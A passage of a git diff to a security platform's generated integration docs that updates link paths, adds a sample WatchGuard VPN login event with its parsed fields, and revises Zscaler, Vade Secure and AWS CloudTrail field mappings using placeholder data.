| |`url.query` | `keyword` | Query string of the request. | diff --git a/_shared_content/operations_center/integrations/generated/d14567dd-56b1-42f8-aa64-fb65d4b0a4cf.md b/_shared_content/operations_center/integrations/generated/d14567dd-56b1-42f8-aa64-fb65d4b0a4cf.md index d064224140..9d527c3cea 100644 --- a/_shared_content/operations_center/integrations/generated/d14567dd-56b1-42f8-aa64-fb65d4b0a4cf.md +++ b/_shared_content/operations_center/integrations/generated/d14567dd-56b1-42f8-aa64-fb65d4b0a4cf.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_network.json" diff --git a/_shared_content/operations_center/integrations/generated/d2725f97-0c7b-4942-a847-983f38efb8ff.md b/_shared_content/operations_center/integrations/generated/d2725f97-0c7b-4942-a847-983f38efb8ff.md index 45a5650225..ff22e5d06a 100644 --- a/_shared_content/operations_center/integrations/generated/d2725f97-0c7b-4942-a847-983f38efb8ff.md +++ b/_shared_content/operations_center/integrations/generated/d2725f97-0c7b-4942-a847-983f38efb8ff.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "salesforce_apex_execution.json" diff --git a/_shared_content/operations_center/integrations/generated/d3a813ac-f9b5-451c-a602-a5994544d9ed.md b/_shared_content/operations_center/integrations/generated/d3a813ac-f9b5-451c-a602-a5994544d9ed.md index 53ea781113..d191dedcbd 100644 --- a/_shared_content/operations_center/integrations/generated/d3a813ac-f9b5-451c-a602-a5994544d9ed.md +++ b/_shared_content/operations_center/integrations/generated/d3a813ac-f9b5-451c-a602-a5994544d9ed.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "7602ff70-7e5f-42e9-86b2-36803df39183.json" @@ -889,7 +889,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "response_elements": "{\"ConsoleLogin\": \"Success\"}" }, "user_identity": { - "accessKeyId": "", "accountId": "1111111111", "arn": "arn:aws:iam::1111111111:root", "principalId": "1111111111", @@ -1260,6 +1259,9 @@ The following table lists the fields that are extracted, normalized under the EC |`aws.cloudtrail.flattened.request_parameters` | `keyword` | The flattened version of the field requestParameters | |`aws.cloudtrail.flattened.response_elements` | `keyword` | The flattened version of the field responseElements | |`aws.cloudtrail.response_elements.pendingModifiedValues.masterUserPassword` | `keyword` | The new master password for the RDS instance | +|`aws.cloudtrail.response_elements.policy.arn` | `keyword` | provides information about the queried policy arn | +|`aws.cloudtrail.response_elements.policy.policyId` | `keyword` | provides information about the queried policyId | +|`aws.cloudtrail.response_elements.policy.policyName` | `keyword` | provides information about the queried policyName | |`aws.cloudtrail.response_elements.user.userName` | `keyword` | The name of the user in the response | |`cloud.account.id` | `keyword` | The cloud account or organization id. | |`cloud.instance.id` | `keyword` | Instance ID of the host machine. | diff --git a/_shared_content/operations_center/integrations/generated/d626fec3-473a-44b3-9e3d-587fdd99a421.md b/_shared_content/operations_center/integrations/generated/d626fec3-473a-44b3-9e3d-587fdd99a421.md index 21c6af27d4..2908dbc0b2 100644 --- a/_shared_content/operations_center/integrations/generated/d626fec3-473a-44b3-9e3d-587fdd99a421.md +++ b/_shared_content/operations_center/integrations/generated/d626fec3-473a-44b3-9e3d-587fdd99a421.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "elff_event.json" diff --git a/_shared_content/operations_center/integrations/generated/d6d15297-e977-4584-9bb3-f0290b99f014.md b/_shared_content/operations_center/integrations/generated/d6d15297-e977-4584-9bb3-f0290b99f014.md index 0003ce5829..0a980e80a2 100644 --- a/_shared_content/operations_center/integrations/generated/d6d15297-e977-4584-9bb3-f0290b99f014.md +++ b/_shared_content/operations_center/integrations/generated/d6d15297-e977-4584-9bb3-f0290b99f014.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_auth_fail.json" diff --git a/_shared_content/operations_center/integrations/generated/d6f69e04-6ab7-40c0-9723-84060aeb5529.md b/_shared_content/operations_center/integrations/generated/d6f69e04-6ab7-40c0-9723-84060aeb5529.md index 85642d7b50..d358cfa6aa 100644 --- a/_shared_content/operations_center/integrations/generated/d6f69e04-6ab7-40c0-9723-84060aeb5529.md +++ b/_shared_content/operations_center/integrations/generated/d6f69e04-6ab7-40c0-9723-84060aeb5529.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "admin_services_service_modify.json" diff --git a/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570.md b/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570.md index 7e4bc74bdc..dd358d27bc 100644 --- a/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570.md +++ b/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth_was_rejected.json" @@ -1248,6 +1248,57 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "user_login.json" + + ```json + + { + "message": "1.0|WatchGuard|XTM|12.10.3.B694994|3E000002|host_name=Member2#011serial=AAAAAAAAAAAAA#011msg=SSL VPN user john.doe@example.org@radius from 1.2.3.4 logged in assigned virtual IP is 4.3.2.1", + "event": { + "category": [ + "session" + ], + "code": "3E000002", + "reason": "SSL VPN user john.doe@example.org@radius from 1.2.3.4 logged in assigned virtual IP is 4.3.2.1", + "type": [ + "start" + ] + }, + "observer": { + "product": "XTM", + "serial_number": "AAAAAAAAAAAAA", + "type": "firewall", + "vendor": "WatchGuard", + "version": "12.10.3.B694994" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "john.doe" + }, + "watchguard": { + "firebox": { + "dhcp": { + "operation": "none" + }, + "virtual_ip": "4.3.2.1" + } + } + } + + ``` + + === "user_login_rejected.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570_sample.md b/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570_sample.md index e19543e178..41486c9bfa 100644 --- a/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570_sample.md +++ b/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570_sample.md @@ -140,6 +140,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "user_login" + + ``` + 1.0|WatchGuard|XTM|12.10.3.B694994|3E000002|host_name=Member2#011serial=AAAAAAAAAAAAA#011msg=SSL VPN user john.doe@example.org@radius from 1.2.3.4 logged in assigned virtual IP is 4.3.2.1 + ``` + + + === "user_login_rejected" ``` diff --git a/_shared_content/operations_center/integrations/generated/d9f337a4-1303-47d4-b15f-1f83807ff3cc.md b/_shared_content/operations_center/integrations/generated/d9f337a4-1303-47d4-b15f-1f83807ff3cc.md index f124bd13e9..7449005ee9 100644 --- a/_shared_content/operations_center/integrations/generated/d9f337a4-1303-47d4-b15f-1f83807ff3cc.md +++ b/_shared_content/operations_center/integrations/generated/d9f337a4-1303-47d4-b15f-1f83807ff3cc.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "access.json" diff --git a/_shared_content/operations_center/integrations/generated/da3555f9-8213-41b8-8659-4cb814431e29.md b/_shared_content/operations_center/integrations/generated/da3555f9-8213-41b8-8659-4cb814431e29.md index 8ff32cd812..dc4276507d 100644 --- a/_shared_content/operations_center/integrations/generated/da3555f9-8213-41b8-8659-4cb814431e29.md +++ b/_shared_content/operations_center/integrations/generated/da3555f9-8213-41b8-8659-4cb814431e29.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "input.json" diff --git a/_shared_content/operations_center/integrations/generated/dbebefdd-dd2e-48a9-89e6-ee5a00ee0956.md b/_shared_content/operations_center/integrations/generated/dbebefdd-dd2e-48a9-89e6-ee5a00ee0956.md index 6e41e12e5d..cff8f2639e 100644 --- a/_shared_content/operations_center/integrations/generated/dbebefdd-dd2e-48a9-89e6-ee5a00ee0956.md +++ b/_shared_content/operations_center/integrations/generated/dbebefdd-dd2e-48a9-89e6-ee5a00ee0956.md @@ -20,7 +20,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_01.json" diff --git a/_shared_content/operations_center/integrations/generated/dc0f339f-5dbe-4e68-9fa0-c63661820941.md b/_shared_content/operations_center/integrations/generated/dc0f339f-5dbe-4e68-9fa0-c63661820941.md index 7f75124581..e6b479b737 100644 --- a/_shared_content/operations_center/integrations/generated/dc0f339f-5dbe-4e68-9fa0-c63661820941.md +++ b/_shared_content/operations_center/integrations/generated/dc0f339f-5dbe-4e68-9fa0-c63661820941.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event_audit1.json" @@ -194,6 +194,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": [ "1.2.3.4", "5.6.7.8" + ], + "user": [ + "johndoe" ] }, "source": { @@ -201,15 +204,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": "1.2.3.4" }, "user": { - "email": "john.doe@example.orf" + "email": "john.doe@example.orf", + "name": "johndoe" }, "zscaler": { "zia": { "category": "Corporate Marketing", "department": "Financial%20Dept", - "device": { - "owner": "johndoe" - }, "source_type": "zscalernss-dns" } } @@ -252,6 +253,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": [ "1.2.3.4", "5.6.7.8" + ], + "user": [ + "johndoe" ] }, "source": { @@ -261,15 +265,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 52352 }, "user": { - "email": "john.doe@example.org" + "email": "john.doe@example.org", + "name": "johndoe" }, "zscaler": { "zia": { "avgduration": "170000", "department": "Financial%20Dept", - "device": { - "owner": "johndoe" - }, "source_type": "zscalernss-fw", "threat": { "category": "Threat category 2", @@ -331,6 +333,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": [ "1.2.3.4", "5.6.7.8" + ], + "user": [ + "johndoe" ] }, "server": { @@ -342,12 +347,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "url": { "domain": "a.et.nytimes.com", - "registered_domain": "nytimes.com", - "subdomain": "a.et", - "top_level_domain": "com" + "original": "a.et.nytimes.com", + "path": "a.et.nytimes.com" }, "user": { - "email": "john.doe@example.org" + "email": "john.doe@example.org", + "name": "johndoe" }, "user_agent": { "device": { @@ -363,9 +368,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "zia": { "appname": "General Browsing", "department": "Financial%20Dept", - "device": { - "owner": "johndoe" - }, "event_id": "1111111111111111111", "keyprotectiontype": "N/A", "product": "NSS", @@ -432,6 +434,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": [ "1.2.3.4", "5.6.7.8" + ], + "user": [ + "johndoe" ] }, "server": { @@ -443,14 +448,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "url": { "domain": "ctldl.windowsupdate.com", + "original": "ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?9ea4b61fd3501b07", "path": "msdownload/update/v3/static/trustedr/en/pinrulesstl.cab", - "query": "9ea4b61fd3501b07", - "registered_domain": "windowsupdate.com", - "subdomain": "ctldl", - "top_level_domain": "com" + "query": "9ea4b61fd3501b07" }, "user": { - "email": "john.doe@example.org" + "email": "john.doe@example.org", + "name": "johndoe" }, "user_agent": { "device": { @@ -466,9 +470,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "zia": { "appname": "General Browsing", "department": "Financial%20Dept", - "device": { - "owner": "johndoe" - }, "event_id": "1111111111111111111", "keyprotectiontype": "N/A", "product": "NSS", @@ -755,13 +756,13 @@ The following table lists the fields that are extracted, normalized under the EC |`url.path` | `wildcard` | Path of the request, such as "/search". | |`url.query` | `keyword` | Query string of the request. | |`user.email` | `keyword` | User email address. | +|`user.name` | `keyword` | Short name or login of the user. | |`user_agent.original` | `keyword` | Unparsed user_agent string. | |`zscaler.zia.appname` | `keyword` | ZScaler app name | |`zscaler.zia.audit.log_type` | `keyword` | ZScaler audit log type | |`zscaler.zia.avgduration` | `keyword` | ZScaler average duration | |`zscaler.zia.category` | `keyword` | ZScaler category | |`zscaler.zia.department` | `keyword` | ZScaler department | -|`zscaler.zia.device.owner` | `keyword` | ZScaler device owner | |`zscaler.zia.event.outcome` | `keyword` | ZScaler event outcome | |`zscaler.zia.event_id` | `keyword` | ZScaler event ID | |`zscaler.zia.keyprotectiontype` | `keyword` | ZScaler key protection type | diff --git a/_shared_content/operations_center/integrations/generated/dcb14795-a6f0-4ebb-a73d-6eb8b982afcd.md b/_shared_content/operations_center/integrations/generated/dcb14795-a6f0-4ebb-a73d-6eb8b982afcd.md index 5d5d57382c..59692757f7 100644 --- a/_shared_content/operations_center/integrations/generated/dcb14795-a6f0-4ebb-a73d-6eb8b982afcd.md +++ b/_shared_content/operations_center/integrations/generated/dcb14795-a6f0-4ebb-a73d-6eb8b982afcd.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "connexion1.json" diff --git a/_shared_content/operations_center/integrations/generated/de9ca004-991e-4f5c-89c5-e075f3fb3216.md b/_shared_content/operations_center/integrations/generated/de9ca004-991e-4f5c-89c5-e075f3fb3216.md index 2eb1c45e18..715bd4f742 100644 --- a/_shared_content/operations_center/integrations/generated/de9ca004-991e-4f5c-89c5-e075f3fb3216.md +++ b/_shared_content/operations_center/integrations/generated/de9ca004-991e-4f5c-89c5-e075f3fb3216.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_audit_log_deleted_inline_policy.json" diff --git a/_shared_content/operations_center/integrations/generated/e0eaf2f1-02d0-4d1a-be89-f2b8be4baf4e.md b/_shared_content/operations_center/integrations/generated/e0eaf2f1-02d0-4d1a-be89-f2b8be4baf4e.md index c117e23209..07ea0bc3be 100644 --- a/_shared_content/operations_center/integrations/generated/e0eaf2f1-02d0-4d1a-be89-f2b8be4baf4e.md +++ b/_shared_content/operations_center/integrations/generated/e0eaf2f1-02d0-4d1a-be89-f2b8be4baf4e.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_maillog.json" diff --git a/_shared_content/operations_center/integrations/generated/e30f7bcc-7c55-4666-9d32-61a0aa75a2c3.md b/_shared_content/operations_center/integrations/generated/e30f7bcc-7c55-4666-9d32-61a0aa75a2c3.md index c41489f627..c125e71488 100644 --- a/_shared_content/operations_center/integrations/generated/e30f7bcc-7c55-4666-9d32-61a0aa75a2c3.md +++ b/_shared_content/operations_center/integrations/generated/e30f7bcc-7c55-4666-9d32-61a0aa75a2c3.md @@ -19,7 +19,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "match_threats.json" diff --git a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md index f0807479a9..6df3aa073d 100644 --- a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md +++ b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "action_overdict.json" @@ -103,6 +103,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } ], "from_header": "user user@test.fr", + "last_report_date": "0001-01-01T00:00:00Z", "overdict": "clean", "status": "LOW_SPAM", "to_header": "header stuff", @@ -261,6 +262,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ], "folder": "JunkEmail", "from_header": "Test SEKOIA.IO ", + "last_report_date": "0001-01-01T00:00:00Z", "status": "PHISHING", "to_header": "\"test@vadesecure.com\" ", "whitelist": "false" @@ -328,6 +330,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } ], "from_header": "Test SEKOIA.IO ", + "last_report_date": "0001-01-01T00:00:00Z", "status": "LEGIT", "to_header": "\"test@vadesecure.com\" ", "whitelist": "true" @@ -360,6 +363,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": "MOVE" } ], + "actions_labels": [ + "MOVE" + ], "id": "zekfnzejnf576rge8768", "nb_messages_remediated": 1, "nb_messages_remediated_read": 0, @@ -397,6 +403,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": "FAILED" } ], + "actions_labels": [ + "DELETE", + "FAILED" + ], "id": "zekfnzejnf576rge8768", "nb_messages_remediated": 76, "nb_messages_remediated_read": 0, @@ -430,12 +440,15 @@ The following table lists the fields that are extracted, normalized under the EC |`source.ip` | `ip` | IP address of the source. | |`vadesecure.attachments` | `array` | vadesecure.to_header | |`vadesecure.campaign.actions` | `array` | The actions carried out for the remediation campaign. | +|`vadesecure.campaign.actions_labels` | `keyword` | | |`vadesecure.campaign.id` | `keyword` | The ID of the campaign | |`vadesecure.campaign.nb_messages_remediated` | `long` | The total number of messages involved in the remediation. | |`vadesecure.campaign.nb_messages_remediated_read` | `long` | The number of total read messages involved in the remediation. | |`vadesecure.campaign.nb_messages_remediated_unread` | `long` | The number of total unread messages involved in the remediation. | |`vadesecure.folder` | `keyword` | vadesecure.folder | |`vadesecure.from_header` | `keyword` | vadesecure.from_header | +|`vadesecure.last_report` | `keyword` | | +|`vadesecure.last_report_date` | `datetime` | | |`vadesecure.overdict` | `keyword` | vadesecure.overdict | |`vadesecure.status` | `keyword` | vadesecure.status | |`vadesecure.substatus` | `keyword` | vadesecure.substatus | diff --git a/_shared_content/operations_center/integrations/generated/e6bb2404-8fc8-4124-a785-c1276277b5d7.md b/_shared_content/operations_center/integrations/generated/e6bb2404-8fc8-4124-a785-c1276277b5d7.md index 9360948843..8474d24372 100644 --- a/_shared_content/operations_center/integrations/generated/e6bb2404-8fc8-4124-a785-c1276277b5d7.md +++ b/_shared_content/operations_center/integrations/generated/e6bb2404-8fc8-4124-a785-c1276277b5d7.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_auth_via_idp.json" diff --git a/_shared_content/operations_center/integrations/generated/e8ca856f-8a58-490b-bea4-247b12b3d74b.md b/_shared_content/operations_center/integrations/generated/e8ca856f-8a58-490b-bea4-247b12b3d74b.md index 7c5655d9bc..2bfac6d493 100644 --- 